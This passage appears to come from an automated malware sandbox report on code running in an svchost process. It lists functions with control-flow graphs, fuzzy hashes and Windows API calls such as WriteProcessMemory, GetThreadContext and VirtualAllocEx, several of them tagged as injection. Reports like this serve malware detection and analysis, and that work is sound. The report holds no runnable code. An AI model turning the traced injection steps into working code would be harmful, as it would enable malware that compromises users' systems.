                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078E8E6A
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 66fda44b6146c9fece9d9c6e85eb6a3a1a18202f87a3dc8ff5903755509709d9
                                • Instruction ID: 308f58c478ba6861466f316103890300efc5ba9e8ec4b17f9a5313811a925dcc
                                • Opcode Fuzzy Hash: 66fda44b6146c9fece9d9c6e85eb6a3a1a18202f87a3dc8ff5903755509709d9
                                • Instruction Fuzzy Hash: 94915DB1809389DFCB02CFA4D8509CDBFB1BF5A324F29929BE454AB2A2D3344955CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F60BD, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 113 53f60bd-53f615d 115 53f615f-53f6169 113->115 116 53f6196-53f61b6 113->116 115->116 117 53f616b-53f616d 115->117 123 53f61ef-53f621e 116->123 124 53f61b8-53f61c2 116->124 118 53f616f-53f6179 117->118 119 53f6190-53f6193 117->119 121 53f617d-53f618c 118->121 122 53f617b 118->122 119->116 121->121 125 53f618e 121->125 122->121 130 53f6257-53f6311 CreateProcessA 123->130 131 53f6220-53f622a 123->131 124->123 126 53f61c4-53f61c6 124->126 125->119 128 53f61e9-53f61ec 126->128 129 53f61c8-53f61d2 126->129 128->123 132 53f61d6-53f61e5 129->132 133 53f61d4 129->133 144 53f631a-53f63a0 130->144 145 53f6313-53f6319 130->145 131->130 134 53f622c-53f622e 131->134 132->132 135 53f61e7 132->135 133->132 136 53f6251-53f6254 134->136 137 53f6230-53f623a 134->137 135->128 136->130 139 53f623e-53f624d 137->139 140 53f623c 137->140 139->139 141 53f624f 139->141 140->139 141->136 155 53f63a2-53f63a6 144->155 156 53f63b0-53f63b4 144->156 145->144 155->156 157 53f63a8 155->157 158 53f63b6-53f63ba 156->158 159 53f63c4-53f63c8 156->159 157->156 158->159 160 53f63bc 158->160 161 53f63ca-53f63ce 159->161 162 53f63d8-53f63dc 159->162 160->159 161->162 163 53f63d0 161->163 164 53f63ee-53f63f5 162->164 165 53f63de-53f63e4 162->165 163->162 166 53f640c 164->166 167 53f63f7-53f6406 164->167 165->164 169 53f640d 166->169 167->166 169->169
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053F62FE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ce6c55dad14ca05e6eec67968db96ad7d161be20ec17bf3ab7fe5bdade661b51
                                • Instruction ID: 9b408491ac7642d84404f754d4634caf6a8f7fad2a5dbf2d8d26bd8a7f11527b
                                • Opcode Fuzzy Hash: ce6c55dad14ca05e6eec67968db96ad7d161be20ec17bf3ab7fe5bdade661b51
                                • Instruction Fuzzy Hash: 2AA17071D04219DFDF10CFA8C8427EEBBB2BF48304F158569E909A7250DB749985CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F60C8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 170 53f60c8-53f615d 172 53f615f-53f6169 170->172 173 53f6196-53f61b6 170->173 172->173 174 53f616b-53f616d 172->174 180 53f61ef-53f621e 173->180 181 53f61b8-53f61c2 173->181 175 53f616f-53f6179 174->175 176 53f6190-53f6193 174->176 178 53f617d-53f618c 175->178 179 53f617b 175->179 176->173 178->178 182 53f618e 178->182 179->178 187 53f6257-53f6311 CreateProcessA 180->187 188 53f6220-53f622a 180->188 181->180 183 53f61c4-53f61c6 181->183 182->176 185 53f61e9-53f61ec 183->185 186 53f61c8-53f61d2 183->186 185->180 189 53f61d6-53f61e5 186->189 190 53f61d4 186->190 201 53f631a-53f63a0 187->201 202 53f6313-53f6319 187->202 188->187 191 53f622c-53f622e 188->191 189->189 192 53f61e7 189->192 190->189 193 53f6251-53f6254 191->193 194 53f6230-53f623a 191->194 192->185 193->187 196 53f623e-53f624d 194->196 197 53f623c 194->197 196->196 198 53f624f 196->198 197->196 198->193 212 53f63a2-53f63a6 201->212 213 53f63b0-53f63b4 201->213 202->201 212->213 214 53f63a8 212->214 215 53f63b6-53f63ba 213->215 216 53f63c4-53f63c8 213->216 214->213 215->216 217 53f63bc 215->217 218 53f63ca-53f63ce 216->218 219 53f63d8-53f63dc 216->219 217->216 218->219 220 53f63d0 218->220 221 53f63ee-53f63f5 219->221 222 53f63de-53f63e4 219->222 220->219 223 53f640c 221->223 224 53f63f7-53f6406 221->224 222->221 226 53f640d 223->226 224->223 226->226
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053F62FE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 7d19bd96461c5f58e3370c2d0a29ce933a0ba89a932f00ba99ddf112d6fea9cf
                                • Instruction ID: 62b784fec30f1124a2743fb513a827473412dbea1fb1562f13605337afac80fe
                                • Opcode Fuzzy Hash: 7d19bd96461c5f58e3370c2d0a29ce933a0ba89a932f00ba99ddf112d6fea9cf
                                • Instruction Fuzzy Hash: 8D917F71D04219DFDF10CFA8C882BEEBBB2BF48314F158569E909A7290DB749985CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E68A1, Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 227 78e68a1-78e68c5 call 78e579c 230 78e68db-78e68df 227->230 231 78e68c7 227->231 232 78e68f3-78e6934 230->232 233 78e68e1-78e68eb 230->233 280 78e68cd call 78e6b38 231->280 281 78e68cd call 78e6b29 231->281 238 78e6936-78e693e 232->238 239 78e6941-78e694f 232->239 233->232 234 78e68d3-78e68d5 234->230 235 78e6a10-78e6ad0 234->235 275 78e6ad8-78e6b03 GetModuleHandleW 235->275 276 78e6ad2-78e6ad5 235->276 238->239 241 78e6973-78e6975 239->241 242 78e6951-78e6956 239->242 245 78e6978-78e697f 241->245 243 78e6958-78e695f call 78e57a8 242->243 244 78e6961 242->244 247 78e6963-78e6971 243->247 244->247 248 78e698c-78e6993 245->248 249 78e6981-78e6989 245->249 247->245 252 78e6995-78e699d 248->252 253 78e69a0-78e69a9 call 78e0d2c 248->253 249->248 252->253 258 78e69ab-78e69b3 253->258 259 78e69b6-78e69bb 253->259 258->259 260 78e69bd-78e69c4 259->260 261 78e69d9-78e69dd 259->261 260->261 262 78e69c6-78e69d6 call 78e55e8 call 78e57b8 260->262 282 78e69e0 call 78e6de8 261->282 283 78e69e0 call 78e6df8 261->283 262->261 265 78e69e3-78e69e6 268 78e69e8-78e6a06 265->268 269 78e6a09-78e6a0f 265->269 268->269 277 78e6b0c-78e6b20 275->277 278 78e6b05-78e6b0b 275->278 276->275 278->277 280->234 281->234 282->265 283->265
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 078E6AF6
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 59f7cd3d7e4abb9bd08fca5a9b324135ac35937998380d659a1a6d2a9ff37cbc
                                • Instruction ID: 2bc5c27ee10967da318327cf550285965be05c04223d32ca32ccce2643c63c5e
                                • Opcode Fuzzy Hash: 59f7cd3d7e4abb9bd08fca5a9b324135ac35937998380d659a1a6d2a9ff37cbc
                                • Instruction Fuzzy Hash: C58167B0A00B068FD724DF29D44075ABBF5FF99214F10892ED48AD7A40EB35E845CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E8224, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 284 78e8224-78e8dbe 286 78e8dc9-78e8dd0 284->286 287 78e8dc0-78e8dc6 284->287 288 78e8ddb-78e8e7a CreateWindowExW 286->288 289 78e8dd2-78e8dd8 286->289 287->286 291 78e8e7c-78e8e82 288->291 292 78e8e83-78e8ebb 288->292 289->288 291->292 296 78e8ebd-78e8ec0 292->296 297 78e8ec8 292->297 296->297 298 78e8ec9 297->298 298->298
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078E8E6A
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: a21dbc6f4fc19aceb7e8fbba3882a4679f204af463b1855912966ea929bd44e6
                                • Instruction ID: 4a76dcd814babb6f9775801776ce0839c489f41c50df438dad52c9859d5783f0
                                • Opcode Fuzzy Hash: a21dbc6f4fc19aceb7e8fbba3882a4679f204af463b1855912966ea929bd44e6
                                • Instruction Fuzzy Hash: 4F51C1B1D00309EFDB14CF99D884ADEBBB5BF59314F24852AE819AB210D7749885CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E8374, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 299 78e8374-78eb33c 302 78eb3ec-78eb40c call 78e824c 299->302 303 78eb342-78eb347 299->303 310 78eb40f-78eb41c 302->310 305 78eb39a-78eb3d2 CallWindowProcW 303->305 306 78eb349-78eb380 303->306 307 78eb3db-78eb3ea 305->307 308 78eb3d4-78eb3da 305->308 312 78eb389-78eb398 306->312 313 78eb382-78eb388 306->313 307->310 308->307 312->310 313->312
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 078EB3C1
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 2bf4b290ffa0d45ed3bf701094e73e69027ec7981970fdd7dda3ad4cbe055f07
                                • Instruction ID: ceffd4c318966649ad496ba5995915cdfc3df5c133266f0ea7caa8dbe353ba49
                                • Opcode Fuzzy Hash: 2bf4b290ffa0d45ed3bf701094e73e69027ec7981970fdd7dda3ad4cbe055f07
                                • Instruction Fuzzy Hash: E4416AF4900309DFCB10CF99C489AAABBF9FF89314F248859E518A7320C730A841CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F6600, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 316 53f6600-53f6656 319 53f6658-53f6664 316->319 320 53f6666-53f66a5 WriteProcessMemory 316->320 319->320 322 53f66ae-53f66de 320->322 323 53f66a7-53f66ad 320->323 323->322
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 053F6698
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: a8d0180c82a4e6291a06403cf19b46cd362568068c7f4c5511f512beefafe9c1
                                • Instruction ID: 478761b5dbf26fa957f6650b7d6402d6f8fb5b3f789a16c8e61e962fdcf0f193
                                • Opcode Fuzzy Hash: a8d0180c82a4e6291a06403cf19b46cd362568068c7f4c5511f512beefafe9c1
                                • Instruction Fuzzy Hash: DB2148719003499FCF00CFA9D885BDEBBF5FF48314F148429E919A7240DB78A954CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F6608, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 327 53f6608-53f6656 329 53f6658-53f6664 327->329 330 53f6666-53f66a5 WriteProcessMemory 327->330 329->330 332 53f66ae-53f66de 330->332 333 53f66a7-53f66ad 330->333 333->332
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 053F6698
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 1b380ee5930e242f3f4767bbd6685f33ab8f54632b275cc867fe204df4d80294
                                • Instruction ID: cc01a5076964143b31edee79e96827c3bfdd167dfe5db2af8d32fc404e7a86d9
                                • Opcode Fuzzy Hash: 1b380ee5930e242f3f4767bbd6685f33ab8f54632b275cc867fe204df4d80294
                                • Instruction Fuzzy Hash: 0B2125719003499FCF10CFAAD885BDEBBF5FF48314F14842AE919A7240DB78A954DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E009C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 348 78e009c-78e0544 DuplicateHandle 351 78e054d-78e056a 348->351 352 78e0546-78e054c 348->352 352->351
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078E0476,?,?,?,?,?), ref: 078E0537
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: fd3672fa7275c1601b3fd31cb6b5ad9d91a02b972b7f409b762f1708486a4d6b
                                • Instruction ID: 1a6c0caa67c0c661e80e6796a3a5bead78254ca4195afaf38a3a31f42f83be03
                                • Opcode Fuzzy Hash: fd3672fa7275c1601b3fd31cb6b5ad9d91a02b972b7f409b762f1708486a4d6b
                                • Instruction Fuzzy Hash: EF21D4B59002489FDB10CF9AD484ADEBBF8EB49324F24841AE915A7310D778A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F6448, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 337 53f6448-53f649b 340 53f649d-53f64a9 337->340 341 53f64ab-53f64db GetThreadContext 337->341 340->341 343 53f64dd-53f64e3 341->343 344 53f64e4-53f6514 341->344 343->344
                                APIs
                                • GetThreadContext.KERNEL32(?,00000000), ref: 053F64CE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: ContextThread
                                • String ID:
                                • API String ID: 1591575202-0
                                • Opcode ID: b9530b5003107117f835f79654677fadb84e17351e00408ffb057a9bb4d7bc7a
                                • Instruction ID: b3c7a1c125caa7b7ab20aa60f8f8a4f5386635e1edf5cd9f28441495a420dae4
                                • Opcode Fuzzy Hash: b9530b5003107117f835f79654677fadb84e17351e00408ffb057a9bb4d7bc7a
                                • Instruction Fuzzy Hash: A2213771D003098FDB10DFAAC4857EEBBF4EF88328F14842AD519A7641CB78A955CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E04A8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 365 78e04a8-78e04aa 366 78e04ac 365->366 367 78e04b3-78e0544 DuplicateHandle 365->367 366->367 368 78e054d-78e056a 367->368 369 78e0546-78e054c 367->369 369->368
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078E0476,?,?,?,?,?), ref: 078E0537
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 438758d2444014f74fbffffd96ca202aba9de95d64e262d24406c6b4ace71263
                                • Instruction ID: cf88aa2fe4758316ff572bc7a651c39e733ca218ed57df75f29cf7a11cf888fb
                                • Opcode Fuzzy Hash: 438758d2444014f74fbffffd96ca202aba9de95d64e262d24406c6b4ace71263
                                • Instruction Fuzzy Hash: 8C21F2B5D002599FDB10CFAAD884ADEBBF8AB48324F24841AE954A3250C378A944CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F6450, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 355 53f6450-53f649b 357 53f649d-53f64a9 355->357 358 53f64ab-53f64db GetThreadContext 355->358 357->358 360 53f64dd-53f64e3 358->360 361 53f64e4-53f6514 358->361 360->361
                                APIs
                                • GetThreadContext.KERNEL32(?,00000000), ref: 053F64CE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: ContextThread
                                • String ID:
                                • API String ID: 1591575202-0
                                • Opcode ID: a897f59ef8ae3e1ed74e78d8feb9d750ef08c7c5d508c2abfebabd673ddec6b0
                                • Instruction ID: e1d6a18fb5b2b74b553ce0f3fc48dec02ae3a19abecb0c0f9a2ca62828ddae73
                                • Opcode Fuzzy Hash: a897f59ef8ae3e1ed74e78d8feb9d750ef08c7c5d508c2abfebabd673ddec6b0
                                • Instruction Fuzzy Hash: 68211571D042098FDB50DFAAC4857EEBBF4AF88328F14842AD519A7641CB78A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E6CF0, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,078E6B71,00000800,00000000,00000000), ref: 078E6D62
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 5b832f7be4ba22d4bb6ef29d735c80b56f8bbf989b37ff57c096c480833a0d87
                                • Instruction ID: fd9d9924e6597f4e4af5260f56e6f129c9d674e43b496cd975191cf317d07a79
                                • Opcode Fuzzy Hash: 5b832f7be4ba22d4bb6ef29d735c80b56f8bbf989b37ff57c096c480833a0d87
                                • Instruction Fuzzy Hash: A02135B69042498FCB10CFAAD844ADEFBF4AB59320F14852AD414A7200D775A554CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078EE9D1, Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 078EEA4B
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: f40d87d79432d86485a90493626d81637845b430812da135cc21239167af17b1
                                • Instruction ID: b1828c662e3e76d8a89c8e9472ce9f7c6e9cc96c99fa1207d222e87455295ebe
                                • Opcode Fuzzy Hash: f40d87d79432d86485a90493626d81637845b430812da135cc21239167af17b1
                                • Instruction Fuzzy Hash: D22136B1D002499FDB10CFAAC484BDEBBF4FB59320F148429E468A7240C378A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F67A8, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053F681E
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 0c10ea71856761cb29e21547fc3dd2be8d08221c8519d5348f830994a439317c
                                • Instruction ID: 61cc574501d86de1b0a60c0fed74f12b065103795890a0485662d79072e3cff2
                                • Opcode Fuzzy Hash: 0c10ea71856761cb29e21547fc3dd2be8d08221c8519d5348f830994a439317c
                                • Instruction Fuzzy Hash: 0A1156719002089BCB10DFAAD845BDFBBF5FB88324F248429E519A7250CB79A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E57E0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,078E6B71,00000800,00000000,00000000), ref: 078E6D62
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 9687cab2344e5ab8622f3c3515e15a7db77358ecbd41a95eeb92e8dfbd8de63b
                                • Instruction ID: 9b11d877c237bf0ba56c7bd0d8a3d02951d912e3d09450ece724ffa08eac98f5
                                • Opcode Fuzzy Hash: 9687cab2344e5ab8622f3c3515e15a7db77358ecbd41a95eeb92e8dfbd8de63b
                                • Instruction Fuzzy Hash: 671144B6E002098FCB10CF9AD448BDEFBF8EB59324F10842EE815A7200C775A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078EE9D8, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 078EEA4B
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: a1831a94dab3356b4b9bab8d4e61812cd35b301d409822672709f45ef459269b
                                • Instruction ID: b67abf8ca1d6dacbfe9e0a7fb4f08cdd9a0883262d1f841b2b2ece5a6ae83227
                                • Opcode Fuzzy Hash: a1831a94dab3356b4b9bab8d4e61812cd35b301d409822672709f45ef459269b
                                • Instruction Fuzzy Hash: 352129B1D006099FDB10CF9AC484BDEFBF4FB59320F148429E568A7240D778A544CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F67B0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053F681E
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 09b48f2cef2b27e49c4b35d79da08fbe8a7a4d846e3145a464efebe333302f06
                                • Instruction ID: 7f5e39244c591f06d6b13085d79b0b3cca7116c94cd004cbdc4e3b23e02b55a3
                                • Opcode Fuzzy Hash: 09b48f2cef2b27e49c4b35d79da08fbe8a7a4d846e3145a464efebe333302f06
                                • Instruction Fuzzy Hash: E4113471D002489FCB10DFAAD845BDFBBF5AF88324F248829E519A7250CB75A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078E6A90, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 078E6AF6
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 1ba3556a8b2a3ddd3655a1ec7b8f16f0f87b01f43ac145c766597a2edfcc461d
                                • Instruction ID: ae45ac47e547889906b0875097b47cb0c0d74573ca746ad4a598d88adabd4d20
                                • Opcode Fuzzy Hash: 1ba3556a8b2a3ddd3655a1ec7b8f16f0f87b01f43ac145c766597a2edfcc461d
                                • Instruction Fuzzy Hash: A51110B1D006498FCB10CF9AD444BDEFBF8EB89324F10842AD829B7600D378A545CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F4D14, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 053F73AD
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 8b43962cc734c2088fbb2c610522cdf1db15c6b861a23212ce3fbc2928079853
                                • Instruction ID: 97b78e28a466a038ed4dbb02d48caaa1375a696d73b028b08862f75d1c238705
                                • Opcode Fuzzy Hash: 8b43962cc734c2088fbb2c610522cdf1db15c6b861a23212ce3fbc2928079853
                                • Instruction Fuzzy Hash: B31106B59007099FDB10DF9AD485BDEBBF8FB48724F10841AE919A7600C374A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 053F7348, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 053F73AD
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 8f1f102b09d3375fddf0c73a430d579026dc5cf2d82d56dcc64db11fb639366f
                                • Instruction ID: 570598754eb97c931e5a44bc5b8d524c5b1f9b939e72ef250ca401ae205683fa
                                • Opcode Fuzzy Hash: 8f1f102b09d3375fddf0c73a430d579026dc5cf2d82d56dcc64db11fb639366f
                                • Instruction Fuzzy Hash: 451103B59002499FDB10CF9AD885BDEBFF4FB48724F24845AE959A7600C374A544CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 078EB420, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 078EB3C1
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 5282cab5def97dfbc78c78d9491cf35de809e791444068990ac509dec0efd28a
                                • Instruction ID: 0b4587dfe358a8392ca179107c30cfbf33be5ac429123ac7bc130af6e44d45c4
